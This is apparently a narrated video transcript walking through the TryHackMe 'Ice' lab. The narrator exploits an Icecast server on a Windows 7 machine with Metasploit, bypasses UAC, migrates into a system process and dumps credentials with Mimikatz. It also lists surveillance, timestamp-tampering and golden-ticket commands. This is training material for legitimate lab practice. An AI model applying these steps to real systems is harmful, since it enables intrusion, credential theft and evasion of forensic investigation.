Hey guys, today I'm gonna be doing the ice room on Try Hack Me. So what we're gonna be doing is we're gonna be deploying and hacking into a Windows machine and exploiting a very poorly secured media server. Okay, so to start, we'll go ahead and get connected to the Try Hack Me VPN. And I already have the configuration file downloaded. So all I have to do is do sudo openvpn home slash desktop slash the configuration file, enter my password. Okay, so that should be connected. There's my IP address for my tunnel adapter. Okay, so we'll just mark all these complete. And if we refresh, should say that we have access to the machine. Oh, I guess we won't yet because I haven't started the machine, but I'll go ahead and start the machine. Okay. So that's booting up our Windows virtual vulnerable machine. Refresh again. Doesn't say we have access to machines, but I think we should be okay. Okay, so we should see our target IP address here in a couple seconds. Okay. See if we can ping it. We'll just call this tab nmap. Doesn't look like we can ping it. What if we just do nmap real quick? Hmm. Play the machine. This may take up to 3 minutes to start. Yeah. Looks like we can reach it. So we should be fine. Sweet. Okay. So this is a guided room, so kind of following along with what it says. Okay, to play the machine, this may take up to 3 minutes to start. Okay, we can click complete for that. Launch a scan against our target machine. I recommend using a SYN scan to scan all ports on the machine. The scan command will be provided as a hint. However, it's recommended to complete the room nmap prior to this room. Okay. Don't need to do that. I've done that quite a while ago. So let's do nmap. So for a scene scan, it's dash capital P. Let's see, dash S capital S for a scene scan. Nmap dash S capital S for T4. And we'll do T5 for the fastest. Then we'll do dash P dash for to scan all ports. We'll do dash dash open for only open ports. And we'll do dash S capital VC for a version and scan and to run the default scripts. Okay, and then we'll supply our IP address. And we'll do dash O capital N to output this as a nmap file. So we'll do istat.nmap. Let that run. We actually have to run this as sudo. Okay, and that should start running. We may have to supply dash capital PN since we can't ping the target first. It does, so nmap won't know that the target is online. So if we do dash capital PN, then we're basically just assuming that it's online and we can go ahead and scan the target. It's almost done, it looks like. It's got 50 seconds. Let's see. Take a look at some of the other questions to see what's going on. Once the scan completes, we'll see a number of interesting ports open on this machine. As you might have guessed, the firewall has been disabled with the service completely shut down, leaving very little to protect this machine. One of the more interesting ports that is open is Microsoft Remote Desktop, MSRDP. What port is this open on? I know that this is going to be... port 3389, because that's the default port for Microsoft Remote Desktop Protocol. But we'll take a look at our results and see if we have anything yet. Almost done with this in stealth scan. Okay. I'm just gonna go ahead and type in 3389 here. Submit that. Yep, that's correct. gonna go ahead and hit complete on that as well. See if our scan is done yet. Not quite. Got 33 seconds on the service scan timing. What does this say? What service did Nmap identify as running on port 8000? First word of the service. We'll see what that is in a second, hopefully. 8 seconds. Okay, there we go. Okay, let's see what we've got. Okay, so there's 3389. Okay. You can see that this is Windows 7 Professional 7601 Service Pack 1. Based on the response from the SMB port here, which is 445. Let's see. There's port 8000. Hmm. Hmm. Wonder why I'm not seeing port 8000. Let's do a quick nmap scan with dash B for port 1000. Wonder why that didn't come up in our scan results unless I'm just blind. Hmm. Didn't see that anywhere. Hmm. Let's run that this nmap scan again. Instead of doing a syn stealth scan, and let's change this to T4. We'll just do a service and, or a version and default script scan. But I think nope, that's not the answer they're looking for there. Let's look at the hint. Nmap doesn't show you the service name. Try running the scan again, possibly with version enumeration switch on. Okay. So instead of running this again, let's do that. Just capital V. Icecast. There we go. The version information says Icecast streaming media server. There we go. This is going to be Icecast. Go ahead and run that nmap scan again as well, though. In the background, just to see if there's anything in there we need. Okay, what does nmap identify as the host name of the machine? We saw that earlier. It is dark-bc, based on the target name, NetBIOS domain name, computer name. We know this is the host name. We'll copy that. Paste that there. Okay. Now, the next task is going to be gaining a foothold. Okay. What do we have here? Exploit the target vulnerable service to gain a foothold. Okay, now that we've identified some interesting services running on our target machine, let's do a little bit of research into one of the weirder services identified, Icecast. Icecast, or well, at least this version running on our target, is heavily flawed and has a high-level vulnerability with a score of 7.5. 7.4 depending on where you view it. What is the impact score for this vulnerability? We'll use cvedetails.com for the answer to the question. So I'll open that up. And now I'll just type in Icecast. See, it comes up. Got a buffer overflow. Let's look at the security vulnerabilities and CVEs for Icecast. Okay, let's see. So let's confirm one that's 7.5. We can do greater than 7 to sort this. Okay, so we've got multiple buffer overflows in the XSL parser for Icecast 2.20. Melee attackers cause a denial of service and possibly execute arbitrary code. We don't want to execute anything against this host that's going to cause a denial of service. We don't want to make it so that any of the services hosted on this machine are inaccessible. So let's look at this next one. Okay, buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute arbitrary code via a HTTP request with a large number of headers. This looks like something we would want to look at, so let's do that. This has a base score of 7.5, an exploitability score of 10, which means that it's easy to exploit. There are a couple of other things that give this 10.0 score. The answer that we're looking for, though, should be 6.4 for the impact score. So let's enter that. And that's correct. And then we want the CVE number for the vulnerability. So that is CVE 2004 1561. Okay, so I'll copy that and paste and submit it. Okay, so that looks good. Let's see what else we've got. Okay, now that we found our vulnerability, let's find our exploit. For this section of the room, we'll use the Metasploit module associated with this exploit. Let's go ahead and start Metasploit using the command msf console. Okay, and this finish, did this actually show port 8000 this time? Yes, it did. Sweet, okay. Yeah, I shouldn't have taken Drachme's advice. I should have just run whatever nmap command I thought would be appropriate. Okay, so let's open up a new tab. I'm going to call this Metasploit. Okay. And then we're just going to start msf console. That run. I'll go ahead and hit complete on this. It should start up. Yep, starting the Metasploit framework console. Okay. Let's see. After Metasploit is started, let's search for a target exploit using the command search icecast. What is the full path, starting with exploit for the exploitation module? Okay. And it says if you are not familiar with Metasploit, take a look at the Metasploit module. I am pretty well versed with Metasploit though, so I'm not going to do that. So we'll search icecast. We probably could also search for the CVE. Let's try that and see if that works. Yes, it does. Okay, sweet. But it doesn't really matter because there's only one exploit for icecast. Okay, this is going to be the full path that we need. Copy that. Paste that here. Okay. Okay, let's go ahead and select this module for use. Type either the command use icecast or use 0 to select our search result. Okay. So do use 0 to select the exploit module. Okay, then do show options to see the available options, things that we need to set. Okay, so it looks like we do need to set our host, which is going to be our target's IP address. And we will need to set lhost because this is actually our IP address of our ETH0 adapter, but we don't want that. We need the IP address of our ton0 adapter, which is our VPN IP. So we'll go ahead and do set lhost, and we'll just do ton0. It should pick that up. Yep. So this should match this 10.13.60.112. Perfect. And then we're going to need to go copy our IP address of our target again. Okay, so we've copied that. We set our hosts IP address. Okay, we'll do options. And we can see that we've got our host set. The R port is 8000. It's going to be the default port for icecast. And then we've got our lhost set, which is our ton0 IP or our VPN IP. We're just going to use Metasploit's default port of 4444 or quad 4 if you like. Okay, so let's go ahead and Okay, so we did that. We'll complete that. Following selecting our module, we now have to check what options we have to set. Run the command show options. There's only required setting, which currently is blank. It's going to be our hosts. Okay. First, let's check that the lhost option is set to our 10.0 IP. Okay, with that done, let's set that last option to our target IP. And now that we have everything ready to go, let's run our exploit using command exploit. And we'll check and see what payload we're using as default. And it looks like we're using Windows, Meterpreter, Reverse TCP. Okay. So we're using Windows for our architecture. For the payload, Meterpreter is Metasploit's default shell. And then we're going to be using a Reverse TCP shell. So what that means is we are going to set up a listener on our box at this port, quad 4, and when we receive an incoming connection from our target, we will get a command shell open, and we will have access to be able to send commands from our machine to the target. Okay, so we'll just type in exploit to exploit the vulnerability. And this is a staged payload. And we do have a meterpreter shell. So if we do get UID, we can see that we are dark-bc dark. Okay. Let's see. We've done that. So now we'll attempt to escalate our privileges with this. Answer the questions below. Okay, enumerate the machine and find potential privilege escalation paths to gain admin powers. Let's do that. Okay. Woohoo! We've gained a foothold into our victim machine. What's the name of the shell we have now? Interpreter. Okay. What user was running that icecast process? It's gonna be dark. What build of Windows is the system? I believe it is 7601. But if we want to actually see how we can find that out, on the actual machine, not this time, not on nmap telling us, which is external, we're now internal to the machine. We can do sysinfo, I believe. Yes. And the build is 7601, as you can see here. Perfect. And we can see that this is a 32-bit version of Windows 7. Well, actually, our shell is 32-bit, but the architecture of this Windows 7 machine is x64. So it's a 64-bit machine. Okay. Let's see. So you've answered that. Now that we know some of the finer details of the system we're working with, let's start escalating our privileges. First, what is the architecture of the process we're running? Is x86. No, this is a 64-bit process. Okay, now that we know the architecture of the process, let's perform some further recon. While this doesn't work the best on x64 machines, let's now run the following command. Run post multi-recon local underscore exploit underscore suggester. This can appear to hang as it tests exploits and might take several minutes to complete. Let's actually do a little bit of manual enumeration before we do that. So what we can do is we can hop into a Windows shell. And we can do who am I priv to see what privileges we have as the user that we're running under the context of. Okay, so it looks like we have SE change notify privilege, bypass traverse checking. System. I think if we do ami/groups, you can see what groups we're part of. Okay. Or these will just be the groups, I think. Let's see. Forget what all the commands for the who am I command are. Let's see. Who am I/user/groups. Okay, so we do who am I/user or oh, okay, so this should show the group membership for the current user, not all the users on the machine. So we're part of everyone, built-in administrators, built-in users, NT Authority Interactive, console logon, NT Authority authenticated users, NT Authority this organization local, or that's one group, I guess. And then local, NT Authority, NTLM authentication, mandatory label, medium, mandatory level. Well, let's do this. Let's get out of here for a moment and go back to our interpreter shell. And then go ahead and upload a tool called WinKeys, which will do some enumeration for us. We'll just use the batch file. Just copy that. Probably have to be sudo to do this. Okay. So now we'll just do upload. And what's it called? It's called this. I think we can do we can maybe specify the directory as custom. Yes, perfect. Okay, so let's go back to our shell. Change into c:\windows. Directory command. What? dir is not recognized as an internal or external command operable program or batch. What? This is a Windows machine. Okay, there we go. File not found. That's interesting. So then it went to c:\windows\temp\winpiece.bat. Interesting. I wonder if we can still execute this even though it doesn't show that it's there. Yeah, it looks like it's working. So it looks like the dark user is part of the administrators group. So you could probably just do get system to escalate our privileges to NT authority system, which is the highest privileged user on Windows. We'll just follow this, I guess. And terminate that. So we'll do run post multi-recon local exploit suggester. Okay. Collecting local exploits for x86/Windows, which is just our current session for this shell. That run. Okay. Valid modules for session 1. See. Okay. We've done that. Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path starting with exploit slash for the first returned exploit? So that would be this, exploit Windows local bypass UAC underscore event viewer. Paste that, submit. Now that we have an exploit in mind for elevating our privileges, let's background our current session using command background or control Z. Take note of what session number we have. This will likely be 1 in this case. We can list all of our active sessions using the command sessions when outside of the interpreter shell. Okay, so we'll do that. I think we can also just do BG for background. Yes. Okay. Go ahead and select our previously found local exploit for use using the command use full path for exploit. So that's going to be this again. Just type in use. There we go. Oops, options. And then all I need to set is our current session Oh, it looks like we do need to maybe set all host as well. Let's see. Local exploits require a session to be selected, something we can verify with the command show options. Set this now using the command set session number. Now that we've set our session number, further option will be revealed in the options menu. We'll have to set one more as our listener IP isn't correct. What is the name of this option? Okay, so I will need to set that then. So first thing we'll do is we'll do sessions, check L to list all of our sessions. It looks like our session ID of our only session is 1. All we have to do is do set session 1. Okay, and then we'll need to do set lhost, and that will be ton 0. Okay, so that's done. That should be good. With this option now, you might have to check your IP on the track may not work using the command IP IDDR. Okay, we don't need to do that. After we set this last option, we can now run our privilege escalation exploit. Run this now using the command run. Note, this might take a few attempts and you may need to relaunch the box and exploit the service in the case that this fails. Hopefully that doesn't happen. We don't want to deal with that. Type in run now. Started the reverse TCP handler on our IP address at quad 4. UIC is enabled, checking level. Part of administrators group, continuing. UIC is set to default. The user access control. Bypass UIC, can bypass this setting, continuing. Configuring payload and stage registry keys, executing payload. Event figured.exe executed successfully. Waiting 10 seconds for the payload to execute. Sending the stage. Interpreter session 2 open. And cleaning up registry keys. Sweet. So now if we do get UID, we should be... Oh, it looks like we're still dark, though. Interesting. Following completion of the privilege escalation, a new session will be opened. Interact with it now using the command session _number. But we're already in it, so you shouldn't need to do that. We can now verify that we have expanded permissions using the command get privs. What permission listed allows us to take ownership of files. Okay. Get privs. Should be SE take ownership privilege. I believe is the privilege that we're talking about. Paste that. Submit. Sweet. Okay, that's correct. Now we're gonna change gears and try to loot some things. Okay. Learn how to gather in additional credentials and crack the saved hashes on the machine using Mimikatz, which is a post-exploitation tool that can grab credentials out of memory on a Windows machine. Okay, prior to further action, we need to move to a process that actually has the permissions that we need to interact with the LSAS service, which is the local security, I forget what LSAS stands for. It's the security process that holds credentials in memory, basically, though. Local Security Authority Subsystem Service. Yeah, right here. Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service, LSAS. That is what we are going to do. Okay, let's see. First, let's list the processes using the command ps. Note we can see processes being run by NT authority system as we have escalated permissions even though our process doesn't. Okay, so let's give that a go. We'll do yes to list the processes. And we can see that most of the processes are running as an NT authority system. LSAS is a NT authority system process. Let's see. In order to interact with LSAS, we need to be living in a process that is the same architecture as the LSAS service x64 in the case of this machine, and a process that has the same permissions as LSAS. The printer spool service happens to meet our needs perfectly for this, and it'll restart if we crash it. What's the name of the printer service? That should be spool SV. Mentioned within this question is the term living in a process. Often when we take over a running program, we ultimately load another shared library into the program, a DLL or dynamic link library, which includes our malicious code. From this, we can spawn a new thread that hosts our shell. Okay, what is the question this is looking for? Oh, spool sv.exe. Yep. Okay, that should be here somewhere. Yep, spool sv.exe. This is an x64 process, and it is running as NT authority system, and has the full path of C Windows System 32 spool sv.exe. So we're going to be poisoning that. Migrate to this process now with a command, migrate dash capital N process underscore name. We can also just do migrate and then the process ID, and in our case, the process ID is spool sv.exe is 1384. So I'll just do that. We're migrating from 3708 to 1384. 3708 is PowerShell.exe, so your PowerShell.exe is dark. But now that we're this process, if we do get UID, we should be NT authority system. Yes, we are. Splendid. Okay. So we've done that. Let's check what user we are now with the command get UID. What user is listed? NT authority /system. Okay. Now that we've made our way to full administrator permissions, we'll set our sights on looting. Mimikatz is a rather infamous password dumping tool that is incredibly useful. Load it now using the command load Kiwi. Kiwi is the updated version of Mimikatz. Okay, so I'll do that. Load Kiwi. We're loading the extension Kiwi. Okay, sweet. So the Kiwi extension has been loaded. We can see success right here. Now what? Complete that. Loading Kiwi into our Meterpreter session will expand our help menu. Take a look at the newly added section of the help menu now via the command help. Help. Now we can see our Kiwi commands. Which command allows us to retrieve all credentials? It's going to be creds underscore all. Okay, creds underscore all. Run this command now. What is Dark's password? Mimikatz allows us to steal this password out of memory even without the user Dark logged in, as there is a scheduled task that runs the icecast as the user Dark. It also helps that Windows Defender isn't running on the box, winky face. Take a look again at the PS list. This box isn't in the best shape with both the firewall and Defender disabled. So we'll run creds underscore all to get Dark's password. And it looks like it is in clear text. What a secure password. Not only is there no firewall or antivirus, but this user's password is very insecure. Okay, so I'll copy that. Okay, now post-exploitation. Explore post-exploitation actions we can take on Windows. Before we start our post-exploitation, let's revisit the help menu one last time in the interpreter shell. We'll answer the following questions using that menu. Okay. What command allows us to dump all of the password hashes stored on the system? We won't crack the administrator password in this case as it's pretty strong. This is intentional to avoid password spraying attempts. Command allows us to dump all the password hashes stored on the system. Should be hashed. Yes. If we run hash dump, you can see all of the password hashes for all the users on this machine. Well, more useful when interacting with the machine being used, what command allows us to watch the remote user's desktop in real time? We're going to do help for that. I'm going to scroll up a little bit, and that should be get desktop. No? Let's see. Oh, here we go. Screen share. Watch the remote user desktop in real time. How about if we wanted to record from a microphone attached to the system? That would be record underscore mic. To complicate forensics efforts, we can modify timestamps of files on the system. What command allows us to do this? Don't ever do this on a pen test unless you're explicitly allowed to do so. This is not beneficial to the defending team as they try to break down the events of the pen test after the fact. I believe this is timestamp. Yes. And it should be... Yes. Manipulate file mace attributes. Okay. And that just modifies timestamps of files on the system. So you don't know when they were created, when they were modified, that type of thing. Golden ticket attacks are a function within Mimikatz which abuses a component to Kerberos, the authentication system in Windows domains, the ticket granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain. What is this looking for? Oh, Mimikatz allows us to create what's called a golden ticket, allowing us to authenticate anywhere with ease. What command allows us to do this? It's going to be in our Kiwi commands. That would be golden ticket create. Paste that, submit. Okay. One last thing to note. As we have the password for the user dark, we can now authenticate to the machine and access it via remote desktop, MSRDP. As this is a workstation, we'd likely kick whatever user is signed onto it off if we connect to it. However, it's always interesting to remote into machines and view them as their users do. If this hasn't already been enabled, we can enable it via the following Metasploit module. Run post Windows manage enable RDP. Okay. So I could certainly try that, since this is a virtual machine. You'll use a tool called Ramina to RDP into this machine. Oops, I didn't want to open another terminal. Ramina should be right here. We need the IP address of our target again. Paste that in there, hit enter. Shoot. Actually have to add a connection. Paste. And whoops. I think we need to change this to 0 for DLS security level. And save. And then let's see, edit username dark. And we'll grab that IP address again from here. Or not IP address, the password of the user. Let's see if we can RDP. Should be able to. We saw that on the Nmap scan that RDP was open. So paste our password in here and we'll do save and connect. And we'll accept the certificate. And it looks like, there we go. And cannot change the resolution of this, it looks like, so I just have this little tiny window here, but you can see that we have IceCast here. The control panel open up, and IceCast is running, so that's interesting. Let's see. Finished all of that. What's the extra credit? Okay. As you advance in your pen testing skills, you'll be faced eventually with exploitation without the usage of Metasploit. Provided above is a link to one of the exploits found on ExploitDB for hijacking IceCast remote code execution. While not required by the RIM, it's recommended to attempt exploitation via the provided code or via another similar exploit to further hone your skills. So we could go here. And take a look at the remote code execution exploit for IceCast. And this is shell code. Yeah, we're not gonna worry about the extra credit. Complete. And we've completed the RIM. Congratulations, you've completed the RIM. Share this with your friends. Alrighty. Thanks for watching.